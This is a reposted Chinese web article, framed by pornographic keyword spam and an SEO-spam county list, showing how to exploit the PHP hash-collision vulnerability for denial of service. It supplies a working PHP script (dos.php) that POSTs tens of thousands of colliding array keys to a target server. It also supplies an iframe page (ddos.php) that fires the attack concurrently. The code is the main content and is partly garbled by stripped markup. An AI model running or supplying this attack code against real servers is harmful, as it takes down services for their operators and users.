国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁(yè) > 編程 > PHP > 正文

PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法分析

2020-03-22 18:37:35
字體:
來(lái)源:轉(zhuǎn)載
供稿:網(wǎng)友
本文實(shí)例分析了PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法。分享給大家供大家參考。具體分析如下:首先聲明:本文內(nèi)容只用于研究學(xué)習(xí)使用,請(qǐng)勿用于非法行為!前面提到過(guò)最近爆出的hash表碰撞漏洞,包括java、python、php等在內(nèi)的很多常用語(yǔ)言均未幸免,今晚咱就來(lái)實(shí)際看看它的威力。攻擊原理:通過(guò)向目標(biāo)服務(wù)器post一組精心拼湊的數(shù)組參數(shù),到達(dá)服務(wù)端后語(yǔ)言底層處理接收到的數(shù)組參數(shù)時(shí),由于該漏洞的存在造成CPU的大量消耗,最終導(dǎo)致服務(wù)器資源耗盡。
不用什么花哨的手法,就用PHP簡(jiǎn)單實(shí)現(xiàn)下看下效果,點(diǎn)到即止。文件:dos.php// 目標(biāo)地址 // 只要目標(biāo)地址存在,不用管它是干嘛的 $host = 'http://127.0.0.1/test.php';$data = '';$size = pow(2, 15);for ($key=0, $max=($size-1)*$size; $key =$max; $key+=$size) $data .= '&array[' . $key . ']=0';$ret = curl($host, ltrim($data,' var_dump($ret); function curl($url, $post, $timeout = 30){ $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:')); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); $output = curl_exec($ch); if ($output === false) return false; $info = curl_getinfo($ch); $http_code = $info['http_code']; if ($http_code == 404) return false; curl_close($ch); return $output;}文件:ddos.php !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" html xmlns="http://www.w3.org/1999/xhtml" head meta http-equiv="Content-Type" content="text/html; charset=gb2312" / title DDOS /title /head body php for($i=0; $i $i++){//并發(fā)數(shù) echo ' iframe src="dos.php a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" /iframe /body /html 希望本文所述對(duì)大家的php程序設(shè)計(jì)有所幫助。PHP教程

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。

發(fā)表評(píng)論 共有條評(píng)論
用戶名: 密碼:
驗(yàn)證碼: 匿名發(fā)表
主站蜘蛛池模板: 延庆县| 泾源县| 汝州市| 台前县| 通榆县| 宁化县| 会昌县| 桦川县| 河北省| 平果县| 新干县| 乌苏市| 台中市| 临汾市| 洪江市| 温宿县| 潞西市| 黄山市| 沅陵县| 信阳市| 青岛市| 衢州市| 巴林左旗| 宁津县| 左云县| 班戈县| 丰县| 来宾市| 务川| 河间市| 桂东县| 太白县| 共和县| 金门县| 西平县| 嫩江县| 保靖县| 阿瓦提县| 土默特左旗| 武强县| 南投县|